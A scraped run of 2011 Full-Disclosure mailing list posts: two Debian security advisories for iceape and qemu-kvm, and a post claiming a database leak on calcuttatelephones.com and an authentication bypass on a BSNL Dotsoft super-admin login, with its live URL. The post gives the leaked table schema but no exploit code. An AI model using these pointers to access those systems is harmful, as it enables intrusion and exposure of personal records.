iEYEARECAAYFAk4OJxgACgkQXm3vHE4uylp0jQCgs0jPrL2AOQvuGit/G8LJxZp/ iz0An2HC02GzKHv3n+IMc7oHuJfBkFZ7 =qqsQ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2269-1] iceape security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2269-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff July 01, 2011 http://www.debian.org/security/faq - - Package: iceape Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2011-0083 CVE-2011-0085 CVE-2011-2362 CVE-2011-2363 CVE-2011-2365 CVE-2011-2371 CVE-2011-2373 CVE-2011-2374 CVE-2011-2376 Several vulnerabilities have been found in the Iceape internet suite, an unbranded version of Seamonkey: CVE-2011-0083 / CVE-2011-2363 regenrecht discovered two use-after-frees in SVG processing, which could lead to the execution of arbitrary code. CVE-2011-0085 regenrecht discovered a use-after-free in XUL processing, which could lead to the execution of arbitrary code. CVE-2011-2362 David Chan discovered that cookies were insufficiently isolated. CVE-2011-2371 Chris Rohlf and Yan Ivnitskiy discovered an integer overflow in the Javascript engine, which could lead to the execution of arbitrary code. CVE-2011-2373 Martin Barbella discovered a use-after-free in XUL processing, which could lead to the execution of arbitrary code. CVE-2011-2374 Bob Clary, Kevin Brosnan, Nils, Gary Kwong, Jesse Ruderman and Christian Biesinger discovered memory corruption bugs, which may lead to the execution of arbitrary code. CVE-2011-2376 Luke Wagner and Gary Kwong discovered memory corruption bugs, which may lead to the execution of arbitrary code. The oldstable distribution (lenny) is not affected. The iceape package only provides the XPCOM code. For the stable distribution (squeeze), this problem has been fixed in version 2.0.11-6. For the unstable distribution (sid), this problem has been fixed in version 2.0.14-3. We recommend that you upgrade your iceape packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk4OKu4ACgkQXm3vHE4uylraKACgnQFTacJ4T4r3jU97BIC+tAzg W7cAoNh5W0sw3o0En/e3W6sn5MlnAzr+ =9nDO -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2270-1] qemu-kvm security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2270-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff July 01, 2011 http://www.debian.org/security/faq - - Package: qemu-kvm Vulnerability : programming error Problem type : local Debian-specific: no CVE ID : CVE-2011-2512 Debian Bug : 631975 It was discovered that incorrect sanitising of virtio queue commands in KVM, a solution for full virtualization on x86 hardware, could lead to denial of service of the execution of arbitrary code. The oldstable distribution (lenny) is not affected by this problem. For the stable distribution (squeeze), this problem has been fixed in version 0.12.5+dfsg-5+squeeze4. For the unstable distribution (sid), this problem has been fixed in version 0.14.1+dfsg-2. We recommend that you upgrade your qemu-kvm packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk4OMwwACgkQXm3vHE4uylpF1wCgr/yYBC/EzaMDMfZV6qWAu0ZQ 8WYAoK/FvSNWCu24VljNhlPxZmyDghOU =onSM -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Calcuttatelephones.com Database Disclosure, BSNL- Dotsoft (Super Admin) Auth Bypass Vulnerability
Calcuttatelephones.com Database Disclosure, Directory Listing http://www.calcuttatelephones.com http://www.calcuttatelephones.com/jto/ Demo: http://www.flickr.com/photos/64621175@N03/5885441132/in/photostream/ Database containing 2600 plus records. phpMyAdmin SQL Dump version 2.5.7-pl1http://www.phpmyadmin.net Host: localhost Server version: 4.0.26 PHP Version: 4.2.0 Database : `bsnl` --- Table structure for table `jtoresult` DROP TABLE IF EXISTS `jtoresult`; CREATE TABLE `jtoresult` ( `roll_no` varchar(40) NOT NULL default '', `circle_appear` varchar(60) NOT NULL default '', `name` varchar(150) NOT NULL default '', `community` varchar(50) NOT NULL default '', `ph_status` varchar(20) NOT NULL default '', `merit` varchar(20) NOT NULL default '', `circle_code` varchar(10) NOT NULL default '', PRIMARY KEY (`roll_no`) ) TYPE=MyISAM; BSNL- Dotsoft (Super Admin) Auth Bypass Vulnerability Profile: *Dotsoft* is an in-house developed software, integrating the Commercial Activities, Telecom Billing Accounting, FRS and Directory Enquiry. It has been implemented in *171* SSAs (Districts) across the country. Company URL: http://dotsoft.bsnl.co.in/ SUPER ADMIN LOGON: http://dotsoft.bsnl.co.in/helpdesk/admin.asp Demo: http://www.flickr.com/photos/64621175@N03/5884121702/in/photostream http://www.flickr.com/photos/64621175@N03/5883556231/in/photostream Pradip Sharma Cyber Security Research Analysts, iSolution Software Systems Pvt. Ltd.www.isolutionindia.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
